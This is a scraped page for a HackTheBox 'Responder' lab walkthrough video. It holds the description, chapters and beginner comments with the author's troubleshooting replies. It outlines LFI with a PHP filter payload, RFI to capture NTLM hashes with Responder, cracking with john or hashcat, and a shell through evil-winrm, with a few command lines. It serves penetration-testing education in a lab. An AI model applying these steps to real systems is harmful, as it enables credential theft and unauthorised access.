Tier 1: Responder - HackTheBox Starting Point - Full Walkthrough

Подписаться 35 тыс.

Просмотров 71 тыс.

50% 1

Learn the basics of Penetration Testing: Video walkthrough for the "Responder" machine from tier one of the ‪@HackTheBox‬ "Starting Point" track; "you need to walk before you can run". We'll be exploring the basics of enumeration, service discovery, Local File Inclusion (LFI), Remote File Inclusion (RFI), NTLM hash grabbing with Responder, hashcracking (john the ripper), evil-winrm and more! Write-ups/tutorials aimed at beginners - Hope you enjoy 🙂 #HackTheBox #HTB #CTF #Pentesting #OffSec
Sign up for HackTheBox: hacktheboxltd.sjv.io/xk75Yk
↢Social Media↣
Twitter: / _cryptocat
GitHub: github.com/Crypto-Cat
HackTheBox: app.hackthebox.eu/profile/11897
LinkedIn: / cryptocat
Reddit: / _cryptocat23
RU-vid: / cryptocat23
Twitch: / cryptocat23
↢HackTheBox↣
affiliate.hackthebox.com/cryp...
/ hackthebox_eu
/ discord
↢Video-Specific Resources↣
book.hacktricks.xyz/pentestin...
www.sikich.com/insight/using-...
book.hacktricks.xyz/pentestin...
↢Resources↣
Ghidra: ghidra-sre.org/CheatSheet.html
Volatility: github.com/volatilityfoundati...
PwnTools: github.com/Gallopsled/pwntool...
CyberChef: gchq.github.io/CyberChef
DCode: www.dcode.fr/en
HackTricks: book.hacktricks.xyz/pentestin...
CTF Tools: github.com/apsdehal/awesome-ctf
Forensics: cugu.github.io/awesome-forensics
Decompile Code: www.decompiler.com
Run Code: tio.run
↢Chapters↣
Start: 0:00
Enumerate ports/services (NMap): 0:19
Wappalyzer/Nikto/Gobuster: 1:45
WinRM/evil-winrm: 5:20
Local File Inclusion: 6:55
LFI PHP filter Trick: 11:00
RFI + Responder = NTLM Hashes: 12:04
Crack hash with John: 17:04
Shell with evil-winrm: 17:58
End: 19:13

Наука

Опубликовано:

3 июл 2024

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист

Посмотреть позже

Комментарии : 203

@thenextdoorpanda6181 2 года назад

Fkn lifesaver dude! Been stuck on that LFI question for days, because of the way they had formatted it. The answer they wanted made no sense to me - had they presented them in bullet points, it would've been much more clear - I genuinely just got confused as they had 3 strings back to back. Also, didn't think to add the IP to my /etc/hosts file & was wondering why it wouldn't connect to the website; thx! Keep up the great work, man!

@_CryptoCat 2 года назад

I was thinking a multiple choice option would be better there as well! It would be good to see that implemented in future so they can use a mix of text entry and multiple choice questions. Thanks mate 🙏🥰

@retro-tvhead4883 2 года назад

awesome thank you so much for this guide, I'm still very new so a little extra help here was needed. You talked the process and explained things very well. Helpful videos like this means it's less likely that people will quit when they hit a bit of a wall as i did here, I will run the process through a few times again solo, just to graps it all. Again many thanks.

@_CryptoCat 2 года назад

thank you mate! appreciate the positive feedback 🙏🥰

@patrickmoloney672 5 месяцев назад

You're walkthroughs are incredible. Thank You.

@_CryptoCat 5 месяцев назад

Thank you!! Much appreciated 🥰

@stig7160 Год назад

Amazing walkthrough! It really helps that you show us how you are moving forward and how you are googling to get learn all the different things needed. I did this box before I saw your video, but I didn't manage to get through it without having a peek at the walkthrough provided on htb as I didn't really know about the responder and it didn't show up in any of my google searches neither. But searching for the exact TCP port like you did would have probably gotten me on the right track :)

@_CryptoCat Год назад

Thank you! 🙏🥰

@EliteBuildingCompany 10 месяцев назад

I've been struggling for a few days trying to connect with certain machines, looking at hundreds of forum posts, and all i needed to do was add the address to host file, which i did learn ages ago btw lol. Really happy i stumbled on this video, thanks for the upload.

@_CryptoCat 10 месяцев назад

Haha it happens! Even if the final answer was something you knew, you're developing research skills in the process 😉

@EliteBuildingCompany 10 месяцев назад

@@_CryptoCat Indeed, i'm about to be the best researcher this side of England lol, thanks again.

@JohnS677 2 месяца назад

Dude, you're my hero! I couldn't figure out why responder was picking up my local router instead of the htb IP. I was using wlan0 instead of tun0. Thanks so much!

@AstraGamesStudios 7 месяцев назад

THANK YOU SO MUCH! I love how you show different methods and hacks! Keep it up!

@_CryptoCat 7 месяцев назад

Thank you!! 💜

@bj76681 2 года назад

Thanks for this video buddy :) good one.

@athimngqundaniso8509 2 года назад

You are a lifesaver!!! And you've earned a new subscriber 🤝🏽

@athimngqundaniso8509 2 года назад

For the responder, I kept getting the set.daemon() deprecated error so I was unable to see the hash code. Do you perhaps know how to go about solving that?

@_CryptoCat 2 года назад

Hmmm it might be similar to this: code.djangoproject.com/ticket/32638 Try and run with an earlier version of Python (not 3.10) and/or double-check you're using the latest Responder: github.com/lgandx/Responder

@erica.5620 2 года назад

Was praying for a walkthrough. I don't like that flags aren't randomly generated per-person on htb, but on instances where I physically can't reach the flag because of a bug and not being able to use a tool just being able to progress the starting point is really helpful. Loved the approach as well CryptoCat, thanks!

@_CryptoCat 2 года назад

thanks! happy to help 🥰

@safesploit 2 года назад

Also worth noting, HTB Starting Point in the top-right of their respective tab for the challenge have 'Open Walkthrough' which is a PDF write-up on the CTF.

@_CryptoCat 2 года назад

@@safesploit Yep, same as for retired boxes! The walkthroughs are excellent, I always recommend reviewing them after solving a machine as they contain a lot of background info that you wouldn't get from solving the box alone, but will improve overall understanding 🙂

@Death_User666 Год назад

make more I subbed ive been stuck on this one for almost 2 months

@Z0nd4 Год назад

Thank you very much!

@pawelk3k Год назад

thank you for this video, i had a dns problem! And thanks to you I was able to solve this problem and then look for information on the internet

@_CryptoCat Год назад

Excellent! 🔥

@idodo329 Год назад

Well done bruv, your hacking skills are insane! keep it up, your videos are great!!

@_CryptoCat Год назад

Thanks mate! 👊

@cyberhound_tech_781 2 года назад

@cryptocat Thank you for the Video.. I was stuck and needed help. This was what I needed. Thanks!

@_CryptoCat 2 года назад

thanks mate 🥰

@karthikbt7239 9 месяцев назад

Thank you for this. This machine was too tough for me and I still need to understand a lot of what you did but very insightful video

@_CryptoCat 9 месяцев назад

🙏🥰

@toxicrootvip7264 2 года назад

Thanks !

@ProdMonte 5 месяцев назад

You are the best out here

@_CryptoCat 5 месяцев назад

🥰🥰🥰

@git-tauseef 2 года назад

Subscribed and followed on Twitter 💕

@_CryptoCat 2 года назад

ty 🥰

@Riushda1 Год назад

Nice video ! I feel like this challenge is much more difficult than the other one of the same tier, I was able to do the other challenges by myself but without the write-up I wouldn't have been able to complete this one.

@_CryptoCat Год назад

I agree, this one was a bit trickier than others!

@karthikbt7239 9 месяцев назад

Exactly. I am a beginner and this challenge is quite confusing

@user-vf5lj4dc2x 2 года назад

Respect! thx

@_CryptoCat 2 года назад

💜

@git-tauseef 2 года назад

Just 💕 wow!!

@_CryptoCat 2 года назад

💜

@htsec4923 2 года назад

Nice effort

@_CryptoCat 2 года назад

thanks mate 🥰

@br_nidas Год назад

thanks guy :D

@ShahrinRahman 2 года назад

@_CryptoCat 2 года назад

thank you 🙏🥰

@tamim8574 Год назад

Nice video

@_CryptoCat Год назад

ty 🙏

@Suviiii69 8 месяцев назад

❤❤amazinggg

@_CryptoCat 8 месяцев назад

ty 💜💜

@ivanyursek3661 Год назад

@CryptoCat thank you very much for this walkthrough. It was very informative! I just have one question (and this is one of the things that has been baffling me in my journey to becoming a Red Teamer thus far: choosing the right tools for the job. Why did you choose Evil Winrm? Could SSH have done the same job?

@_CryptoCat Год назад

thanks mate 🥰 the SSH port was closed on this one, otherwise that would of been a great option! winrm would of done the job fine (connecting to that 5985 port) but evil-winrm has some powerful functionality: github.com/Hackplayers/evil-winrm

@BroodPitt 2 года назад

Nice video!! little thing with that samba //10.10.14* you need to listen on the samba port not port 80 😃

@_CryptoCat 2 года назад

Oh yeh, that makes sense 😂 Thanks 🥰

@Aslamkaztro Год назад

❤❤❤❤

@_CryptoCat Год назад

💜

@firecasts Год назад

THANKS FOR THE TIP ON 12:18 sometimes HEADACHE IS NOT SUFFICIENT TO FIND THE ANSWER

@ryanwalker4660 Год назад

where do you get these wordlist files for john? I'm guess that a lot of these tools are pre-installed in kali and you would have to figure out how to get them installed for a different distro or maybe if it is pre-installed in kali maybe just load up that distro and grab the wordlist I need?

@_CryptoCat Год назад

Yep, kali and parrot will come with a lot of tools and should have some wordlists in /usr/share/wordlists by default. You can also install a repo of wordlists with "sudo apt-get install seclists" but if on a non-kali/parrot machine you might need to manually clone the git repo: github.com/danielmiessler/SecLists

@rottenfanger 7 месяцев назад

awesome, thanks for the video ! I tried adding /etc/hosts in WSL, but I still cant open unika.htb, I use windows. Does WSL configuration doesnt come in-line with windows?

@_CryptoCat 7 месяцев назад

Hey, thanks! You can edit the hosts file in Windows as well, it's in System32/drivers/etc/ - www.hostinger.co.uk/tutorials/how-to-edit-hosts-file

@DoDo-uw2no 2 года назад

Hey I really liked your video. I have one problem which makes nmap scans very painful for me. Doing the same scan as you takes me a whopping 30-40 minutes. If I use -T4 as a option it takes about 15 minutes... Any idea what might be causing such slow scanning times? Of course scanning only the first 1000 ports doesn't take that long but that made me miss the WinRM port the first time I was scanning :/ Any advice you can give me to troubleshoot this issue?

@_CryptoCat 2 года назад

Thanks 🥰 They can take a while but 30-40 minutes seems way too long! It might be worth trying another site e.g. TryHackMe, to try and identify whether the problem is with your connection to HackTheBox, or your network/config more generally. For HTB you could try and regenerate your VPN pack or swap server / upgrade to VIP to see if that helps. Lastly, you can run NMap with the verbose flag, so you at least see the open ports as they are discovered 😉

@DoDo-uw2no 2 года назад

@@_CryptoCat Thanks for the reply! I am already VIP. I switched VPN over UDP which improved my speeds. It's still not as fast as yours but it's ok: 10-13 minutes to scan all ports of one IP address. Thanks for hinting me in the right direction :)

@TheSkulldraw Год назад

Hey thanks for this video! I was wondering how I could find the LFI vulnerability (AKA the windows host file ) on the target without the help of the htb questions. And I’m struggling because the vulnerable page display an error which is considered by gobuster as a 400 status. So every path tried is considered a success. I could also try to add ../ until I find what I want but it’s not a very efficient way ? How would you do it ? Thanks again for the video it is very helpful!

@_CryptoCat Год назад

You can use the --exclude-length option if all responses return to the same response code, e.g. "don't show any responses that are 100 bytes long". You could also switch to a tool like ffuf, that allows you to filter by response code, length *or* regex, so you could just filter out the responses with an error message 🙂

@Manu-se5tx 5 месяцев назад

Hi I have a question, basically what we are doing is using LFI, we "create" A server that then we access by the target forcing it to authenticate with NTLM (that we are hosting to get the challenge hashed with the password) to then crack the challenge to get the password and then access the winrm, my question is what is the point if we have to guess the password anyways? Wouldn't unhashing the challenge be the same as guessing the password directly? Is it to not get noticed too much by avoiding to brute force a login?

@_CryptoCat 5 месяцев назад

You're right IRL you'd rather avoid detection (and lockouts) by cracking the hash rather than the password. Apart from that, cracking the hash locally removes the network dependency should be much faster with a good GPU. Even better, you might find the hash has already been cracked by someone else! Finally, you can use the hash directly for relay attacks (although unfortunately not pass-the-hash).

@Manu-se5tx 5 месяцев назад

@@_CryptoCat got it thank you!

@Thommm63 2 года назад

Hi and thank you for this great tuto! Small question, at 56 seconds you open a new menu with the "G" key? Is this part of TLDR? I can't access this menu... Thank you in advance for your answer :)

@_CryptoCat 2 года назад

Good question! I should of mentioned that is "navi", a tool that was recently recommended to me. It allows you to add (or create) cheatsheets and easily execute them: github.com/denisidoro/navi

@Thommm63 2 года назад

@@_CryptoCat Thank you so much for sharing and for your work. Good continuation :)

@tomerbalkai Год назад

@@_CryptoCat Hi, I searched through the web and couldn't find any way to install the tool. could you help out? I am struggling with this for 2 days now

@_CryptoCat Год назад

@@tomerbalkai There's a few ways to install it, if you check here (scroll down): github.com/tldr-pages/tldr You'll see any option to install with npm or python. I probably used the python method, e.g. "pip install tldr". edit: sorry, I realised you are talking about navi, not tldr. I can't remember if I used the "cargo" install method or the install script: github.com/denisidoro/navi/blob/master/docs/installation.md - you can also download the pre-compiled binary and add it to your path so quite a few options to try 😉

@susgreg 10 месяцев назад

Which repo did you import for "navi" tool to have these records?

@_CryptoCat 10 месяцев назад

Hey, good question. There are some security-focused cheatsheets on the navi repo as well as some external, e.g. github.com/esp0xdeadbeef/cheat.sheets or, you can create your own. In all honesty, I don't use it very often but I guess if you get in the habit of using in your day-to-day, it's good.

@adeenmum111 Месяц назад

I'm not getting my hash in responder it is listening for events, the ip of listener is the same I give in url but nothing happens. Any idea why?

@_CryptoCat 19 дней назад

Hmmmm double-check each step in the vid, or check the official PDF walkthrough as it might use a slightly different approach. You might find additional troubleshooting steps on hackthebox forums/discord 🙂

@MegaFartinyourface 2 года назад

Hi, i keep getting the [!] Error: tun: Interface not found. What did i do wrong?

@_CryptoCat 2 года назад

check 'ifconfig' and make sure you have a tun0 adapter, that should indicate you are connected to the VPN

@tomdev6701 2 года назад

Hi and thanks for this! In navi what do you use as cheat sheet? You have 817 of them. Are these custom ones?

@_CryptoCat 2 года назад

ermmm tbh I haven't really used many of them 😂 I just installed whatever security related ones I could find linked to the navi github. My friend put together these cheat sheets though, which I'd definitely recommend for pentesting: github.com/esp0xdeadbeef/cheat.sheets

@tomdev6701 2 года назад

@@_CryptoCat Nice for nmap ! :) tks a lot!!!

@skiball9105 Год назад

For the subl part? In sublime text editor, do I need to type the screen at 2:23? Or is there a file I need to download to be able to view the website? When i downloaded subl, it comes up as blank

@_CryptoCat Год назад

try and open up "/etc/hosts" in subl, you should have it on linux system with some default text in there

@skiball9105 Год назад

@@_CryptoCat thank you!!!!!

@mendelsmith4005 Год назад

i just wanted to know that how did you answered the windows service listening port question which was the second last question, and the answer was 5985, but how did you deduce that answer

@_CryptoCat Год назад

Hmmm I probably just knew this already, as the WinRM service (5985) is exploited a lot in pentesting. If you didn't know, you could check the NMap scan and google each of the ports/services. You could probably find it in the evil-WinRM documentation as well.

@jijobuje 10 месяцев назад

In my case responder is not producing any hash. What can be the problem?

@_CryptoCat 10 месяцев назад

Hey, did you solve it? If not, double check the steps in the video and official PDF walkthrough.. If everything is the same, it should work 🙂

@adeprince 2 года назад

I keep getting this error when i try to launch the responder using "sudo python Responder -I ..." /Responder.py", line 42 print color("[!] Responder must be run as root.") which git repository did you clone from

@_CryptoCat 2 года назад

I don't think I used git repo, AFAIK it comes with parrot os (I know it does kali).. Try to run your Responder.py with sudo privs

@sev7463 2 года назад

I had the same issue, here's what worked for me: "sudo python2 Responder.py -I tun0" Use "phython2" instead of "python". This allowed me to intercept the NTLM hash without the error anymore. Hope this helps.

@joseph2187 2 года назад

Damn I installed tldr but when I run 'tldr nmap' it says 'No tldr entry for nmap' :'(((((((

@joseph2187 2 года назад

Nvm... I had to update it using 'tldr -u' Eat that LSD everybody!!! 👾🐔

@_CryptoCat 2 года назад

haha good advice 😂

@n0pl4c3 2 года назад

Navi actually looks like a really interesting tool, I'll note that one down. May I ask which repo you got the cheatsheet for nmap etc. from, or is that one selfmade?

@_CryptoCat 2 года назад

I installed this one: github.com/esp0xdeadbeef/cheat.sheets and some of the security related ones from the Navi repo. I really need to put my own commands into the cheatsheet but I cba 😂

@n0pl4c3 2 года назад

@@_CryptoCat Thanks a lot, definitely a nice tool though, that I could see becoming all the more useful under time pressure at a ctf or something, nothing worse than sitting there in the last hour getting stuck when forgetting about how a tool exactly worked again.

@kaiahnung8326 Год назад

@@_CryptoCat hey, i can't manage to install the shell widget on kali. i get this errormessage: navi widget fish | source source: not enough arguments Command 'navi' not found, did you mean: command 'savi' from deb savi command 'nvi' from deb nvi command 'navit' from deb navit command 'nabi' from deb nabi Try: sudo apt install so ctrl + g dosen't work for me.

@_CryptoCat Год назад

@@kaiahnung8326 Did you follow the instructions on the GitHub? github.com/denisidoro/navi

@kaiahnung8326 Год назад

@@_CryptoCat yeah but something went wrong. however, i tried it with brew and it works pretty well now. thanks.

@lostshadow828 11 месяцев назад

i don't understand wy add the ip and domain to etc/hosts ?

@_CryptoCat 11 месяцев назад

It's mostly just so that you don't need to remember the IP address, i.e. it's easier to memorize responder.htb than 10.123.18.90. Often the websites will use links like responder.htb/login as well, so if you don't have it set in the hosts file, it simply won't know where to resolve. Also, if you want to enumerate subdomains, you'll first need to have the domain linked via /etc/hosts.

@NimbleSF Год назад

Hey this was really great. As someone who is a true beginner I'm not really sure if the point of these boxes is to just stump me or what lol. It says "Very Easy" but someone who is new to the world of pentesting sure wouldn't know what Responder is.

@_CryptoCat Год назад

Thanks and you're totally correct, HTB is hard.. even when it is "easy". That's especially true when you're new to cybersecurity (maybe IT in general). You'll learn through the struggle though 🙂

@tylertbone9 Год назад

I get an OpenSSL::digest initialization error when trying to connect to the evil-winrm. I’m using the VPN and am stuck. Any idea why?

@_CryptoCat Год назад

check this out: forum.hackthebox.com/t/evil-winrm-error-on-connection-to-host/257342/4

@tylertbone9 Год назад

@@_CryptoCat thanks for the quick response. Ended up just running a base kali Linux iso on my VirtualBox and got it to work. I think wsl2 kali Linux has some issues with this. Better practice for me to use a VirtualBox anyways. Thanks again! Great videos and really helping me learn

@dororix9047 Год назад

Hey man, for some reason my responder keeps on listening without giving me any hash. Do you know why that might be? I'm using my own kali machine

@_CryptoCat Год назад

Not too sure, I would suggest to double-check the steps in the video and/or official PDF walkthrough

@iyyananugrah8234 Год назад

Can I get help with this error message when using evil-winrm "Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error Error: Exiting with code 1 " I tried at my laptop using ubuntu 22.04.1 LTS or pwnbox, the result is same error,

@_CryptoCat Год назад

It's a problem with the OpenSSL version: forum.hackthebox.com/t/evil-winrm-error-on-connection-to-host/257342 You can update your OpenSSL library OR use this quick fix: forum.hackthebox.com/t/lab-access-openvpn-certificate-verify-failed/257102/2

@loeffelatom Год назад

when connecting with evil-winrm i always get: Error: An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired, pls i need help 😥

@_CryptoCat Год назад

Could be a lot of things, I'd recommend to check forum.hackthebox.com/search?q=evil-winrm%20error or ask in the discord - discord.gg/hackthebox

@karemtalli1339 Год назад

Nice video! there's is something I dont get though, I understand virtual hosting and why we need to add the ip address to the /etc/hosts file. I understand the server wouldn't know to which hostname to redirect the browser if we type in the ip address without that. However I dont understand why if we type the hostname in the browser (without updating /etc/hosts) the page won't load. can you explain on that ? thanks.

@_CryptoCat Год назад

Thanks, and sure! When we type the hostname into the address bar, e.g. responder.htb, the browser will attempt to resolve the DNS. It will ask the OS, "what is the IP address for responder.htb?". First, the OS will look in the /etc/hosts file and see if there's an entry for responder.htb. If so, it will return that IP and redirect the browser accordingly. If there is no entry for responder.htb it will reach out to DNS servers, e.g. Google, and ask if they know which IP address is associated with the domain. Since responder.htb isn't a real website (.htb isn't even a valid TLD), no DNS server will be able to find an IP, so our only option is to add an entry to /etc/hosts. Hopefully I understood your question properly and the answer made sense 😁

@karemtalli1339 Год назад

@@_CryptoCat Yes perfect that explains it. thanks a lot

@anonymousprogramming4800 Год назад

Hi, May I know which distribution are you using ?

@anonymousprogramming4800 Год назад

I mean which Linux version?

@_CryptoCat Год назад

I'm running the latest version of Parrot OS: www.parrotsec.org/

@Dillonwrx Год назад

I expected same app on my android, if it is possible share a googleplay link please

@_CryptoCat Год назад

App for what??

@GeratTheGreat 2 года назад

keep getting this error when trying to run responder "Error starting TCP server on port 3389, check permissions or other servers running.", anyone else have this or know how to fix?

@_CryptoCat 2 года назад

are you running with sudo? do you have something running already on port 3389 (RDP)?

@PratikPol 21 день назад

@@_CryptoCat I am also getting the same error as @GeratTheGreat. And yes on port 3389 I have a RDP Session because I am doing on Practice-Labs. Is there a way to change port of Responder instead.

@jaz11350 2 года назад

Having a issue with adding the host file . I added it to subl but my page is still black

@_CryptoCat 2 года назад

sometimes it takes a while.. think i saw ippsec show how to force refresh it before but i cant remember. maybe try to close browser and clear cache.

@jaz11350 2 года назад

@@_CryptoCat i ran it threw burp and I'm getting a 200 but just a blank screen lol

@jaz11350 2 года назад

And I didn't think of that 😕 duh

@jdkillianjdk724 2 года назад

Hey ! Nice one ! I was struggling with this one.. I didn't add the /etc/hosts so i can't see the website nor uses responder well. Btw my john --wordlist=path hash didn't show me cracked password i've tried some other command, deleting ~/.john/john.pot but still don't have it :/ Any ideas ?

@_CryptoCat 2 года назад

hmmm you can try run it with the --show flag, although I think it might just use the potfile. are you using the same rockyou wordlist? should work!

@jdkillianjdk724 2 года назад

@@_CryptoCat Well i retry with the exact same file and command and it worked uhu I probably make a mistakes somewhere ! Thanks :D

@alteo8588 2 года назад

I had the same issue and fixed it. It was because the rockyou.txt file was zipped. I simply unzipped it: sudo gzip -d /usr/share/wordlists/rockyou.txt.gz I'm assuming you're on Kali Linux as this is where the wordlist is located by default.

@b4kug0u8 Год назад

don't know if there's any chance for someone to answer but here i am: Succeed to get the Admin hash with responder, but when it comes to john, when my hash.txt is "Administrator :: Responder : xxxxxxx" john says to me that "No password hashes loaded" and when I put only "xxxx" with no "Administrator:: Responder:" john tells me that he loaded 2 passwords with no different salts aaaand... that's all so far. No mdp, no more infos. What do i do wrong please ?

@_CryptoCat Год назад

Ermm try it with hashcat, e.g. "hashcat -m 5600 hash_file.txt /path/to/wordlist.txt"

@b4kug0u8 Год назад

@@_CryptoCat Ok it worked just fine thanks :) Why do you think it didn't with John, any idea?

@_CryptoCat Год назад

@@b4kug0u8 hmmm not sure, maybe the format wasn't quite right or you need to specify the format manually

@yassinehzami1670 Год назад

can i do tNice tutorials with the trial version?

@_CryptoCat Год назад

With the trial version of what??

@cipher3966 2 года назад

Why does listening for events never work for me? It just shows nothing

@_CryptoCat 2 года назад

Which part of video you at? I don't think my netcat listener got a hit either (as I had wrong port).

@jokecrash7217 2 года назад

i have an issue using john , where the session is completed but i get no password output and idk what to do really

@biba7859 2 года назад

you did it? same issue...

@jokecrash7217 2 года назад

@@biba7859 i also tried to output to a file to see if anything changed and i tried to see in the .pot file john is creating for the passwords both failed both files came out empty as if john is not producing any output and sth i found iteresting there where is shows the numbers of guesses my sessions end with 0gs

@SamOween 2 года назад

@@jokecrash7217 What OS are you using?

@_CryptoCat 2 года назад

Hmmm I had a look through GitHub issues but couldn't see much, unless this helps: github.com/openwall/john/issues/4852 github.com/openwall/john/issues/5074

@biba7859 2 года назад

@@vrikha I did it with nano. I'll also try this, but I'm not sure if it will help.

@alwan7777 2 года назад

please share your terminal .bashrc file😁 that's really cool bro

@_CryptoCat 2 года назад

It's just the standard parrot config IIRC, here's a terminal colour scheme: imgur.com/a/EXSO6l0 - the only thing is if you use scripts like linPEAS, the colours are not very useful 😂

@alwan7777 2 года назад

@@_CryptoCat thakss😎🔥🔥

@BOMBPHONICS Год назад

Easily my new favorite website but my lord am I behind. I have so much to learn. I'm fascinated and borderline retarded at the same time it seems

@_CryptoCat Год назад

You'll get there! 🙂

@mandalorian2010 Год назад

I am not able to get the hash from responder, and I have done everything exectaly the same to replicate this

@_CryptoCat Год назад

Double check all the steps in the video and the official PDF walkthrough.. Probably something small somewhere

@francesco2092 Год назад

so, tldr nmap ok, but whit ctrl+g don't happens nothing

@_CryptoCat Год назад

This is for the navi cheatsheets right? I remember having to setup the hotkey manually but not sure how I did it.. tbh I never use it 😂

@francesco2092 Год назад

@@_CryptoCat aaaaah ok! thank you

@owengamingtubesucks5865 Год назад

When I change the /etc/hosts it does nothing

@_CryptoCat Год назад

Hmmm you can't access the domain name? Make sure it's "/etc/hosts" rather than "etc/hosts/"

@owengamingtubesucks5865 Год назад

@@_CryptoCat i appreciate the fast reply, tried again today with a new ip and it worked fine so not really sure what was going on yesterday. Thank you anyway

@_CryptoCat Год назад

@@owengamingtubesucks5865 Excellent 👍

@joseph2187 2 года назад

Brehh wut theme is that my Gangster?

@_CryptoCat 2 года назад

for the terminal? imgur.com/a/EXSO6l0 the only problem is.. with some tools colour coding is very helpful e.g. LinPEAS. You can have multiple colour profiles though and easy swap between them 😉

@joseph2187 2 года назад

@@_CryptoCat hell yeah thanks man!

@exaq Год назад

evil-winrm just tells me that there's no route to host even though i did everything correctly the first time (i hope) then re-did it when i found this video to make sure

@_CryptoCat Год назад

hmmm were you able to ping the box? sounds like connectivity issues.

@yogeshcs2003 Год назад

You have to enter the ip address given on the htb account (it is different for everyone) and not the ip given on the document. You can check on google how to add entry on etc/host which is very easy. You are putting the wrong ip which is the problem. I faced the same issue but now solved this problem and I am able to view the website on the browser.

@exaq Год назад

@@yogeshcs2003 i entered the correct ip address from the hackthebox website, i was able to connect to the box but couldn't install a reverse shell on it

@exaq Год назад

@@_CryptoCat yeah i was

@yogeshcs2003 Год назад

@@exaq ok in reverse shell you have to enter your ip in the url. Type ifconfig then see tun0 line where you will get your ip address.

@BOMBPHONICS Год назад

seems handy as shit but tldr doesn't work

@_CryptoCat Год назад

Did you install it? 😁

@BOMBPHONICS Год назад

@@_CryptoCat I got it

@nuridincersaygili 2 года назад

At last i found a mentor... Thank you so much! Here I got a few small open points. 1) When we injected the attacker ip address via page parameter, why the victim tried to authenticate? How does the victim know that it should send the username and hashed password to auhenticate? Furthermore, is it possible to capture that request via netcat with something like -lnvp? I learnt that when a server got a authentication request, it should transmit a challenge to the requester, but still I thought that I can use netcat to prove RFI is possible. Why I cannot catch them via netcat? Why we should add a wrapper such as "php://filter/convert.base64-encode/resource=index.php"to see the contents of index.php? Why it did not work at the first time? What precaution forces us to add this while we can get the contents of the file "hosts.txt" easily? Thanks

@_CryptoCat 2 года назад

Hi mate, thanks for the support! For your first question (on how the authentication request works), I would recommend reviewing the article that I skimmed over in the video: www.sikich.com/insight/using-multirelay-with-responder-for-penetration-testing Your second question; if you setup a netcat listener on SMB port you should see some request from the RFI (I incorrectly used HTTP port in video, which presumably does not have outbound access). Although that should give some response, you would responder to say "I am the machine you are looking for" in response to each of the requests. Final question; We need the PHP filter trick to read PHP files because the vulnerable code is using the "include" function. If we try to access PHP files without the filter, they will be included (executed) and we won't see the source code. Any other extensions e.g. txt should be fine to read without a filter. Hope that helped, all the best 😊

6 месяцев назад

not working only thing im going to hack is my head against the wall

@_CryptoCat 6 месяцев назад

😂

@user-yb1xq3xd4i 8 месяцев назад

WHY YOU DİDNT USE RESPONDER AT RESPONDER MACHİNE BROOOOOOOO THAT WAS NOT COOL

@_CryptoCat 8 месяцев назад

hahaha 😂 I did use responder?? I'm guessing you mean why didn't I jump straight to the obvious solution (based on the name) - Since it's starting point and there will be lots of beginners, I basically want to get people into the habit of enumerating properly and try to demonstrate the process of elimination as I think this is more important than learning any one tool/technique 😆

@user-yb1xq3xd4i 8 месяцев назад

you are right sir i want the obivius one but your way is better. nice work@@_CryptoCat

@_CryptoCat 8 месяцев назад

🥰🥰🥰

@shorkshire3724 2 года назад

why it doesn't show me the port 5985 i'm using this: nmap --open -p- --min-rate 5000 -n -Pn IPADDRESS but just appeared port 80

@_CryptoCat 2 года назад

you'll want to scan all open ports with the -p- flag (or you can specify -p 5985 to speed up)

@SuadAhmed-ud5gt 4 месяца назад

When I used "evil-winRM" I have got this message "bash: Evil-WinRM: command not found" What should I do ?

@_CryptoCat 4 месяца назад

Ermmm if you are using Parrot/Kali it should be pre-installed, make sure it's type exactly as in the video.. If not, you can check the install instructions: github.com/Hackplayers/evil-winrm?tab=readme-ov-file#installation--quick-start-4-methods

@dropz285 Год назад

This was such an awesome video, especially when you go to hacktricks.. I didn't know that existed.

@_CryptoCat Год назад

Glad you liked it 🙂 HackTricks is one of the best resources for sure, I rarely solve CTF challenge or vulnerable machine without referring to it at some stage!

@conorroby882 2 года назад

Im on the evil-winrm part and when i run it it gives me the error as follows. " /var/lib/gems/3.0.0/gems/evil-winrm-3.3/lib/evil-winrm.rb:123:in `completion_check': undefined method `quoting_detection_proc' for Reline:Module (NoMethodError) " please help!

@_CryptoCat 2 года назад

Hmmm it's weird that evil-winrm github doesn't even seem to have an "Issues" tab 🤔 Only thing I could find was: tryhackme.com/forum/thread/6171e3b46b0cfe00412b0a1d Did you install using 'sudo gem install evil-winrm'? Not sure what to suggest really, maybe reinstalling evil-winrm or Ruby itself will help 😕